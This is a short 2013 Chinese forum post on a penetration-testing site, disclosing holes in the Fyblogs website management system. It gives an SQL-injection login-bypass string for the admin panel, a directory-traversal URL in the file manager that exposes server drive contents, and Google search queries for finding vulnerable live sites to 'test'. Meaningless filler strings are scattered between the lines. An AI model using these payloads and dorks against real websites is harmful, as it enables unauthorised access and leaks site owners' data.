中国网络渗透测试联盟
标题:
Fyblogs网站管理系统漏洞
[打印本页]
作者:
admin
时间:
2013-3-7 13:07
标题:
Fyblogs网站管理系统漏洞
漏洞类型: 未授权访问/权限绕过
& h( Z4 U. |* T7 r- y* U
6 o! l3 [- R3 q. t5 Z
简要描述:
4 r# M; R8 q' R3 x3 D) g
9 z+ ]- d4 N+ {3 v8 U- x
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
4 w: g, m2 f: i: @: c
7 g0 B. M$ k* S9 m1 D$ N
详细说明:
, G" J: u% X6 B$ [ m' @ M5 _& _
, @" w& E! q) W% D6 y5 w
后台万能密码 'or'='or'
/ g8 Y1 C4 t i5 ~- O& H! C- ?
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
: S0 K) d1 l) R1 X
admin/uploadfile.asp?currentFolder=/upfiles/../
+ a/ w. W, R& Z2 h
% R) F% N) K2 _
漏洞证明:
1 {- [3 _* Y' s9 O( O
, x& G( V6 [5 h4 T# ~
谷歌:inurl:type.asp?id=1 新闻中心
8 D+ q+ a% S6 k" y6 r: H% Q: ]
或者 :inurl:download_ok.asp?
4 D% h7 }4 |: L" P0 S8 ~! f
- q5 W2 r' e% H0 L1 L
可以测试
8 R. e* n! c h0 O; Y
0 R7 c2 Y+ N1 ~7 S. l
! L& x" _3 F6 [( W- E
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2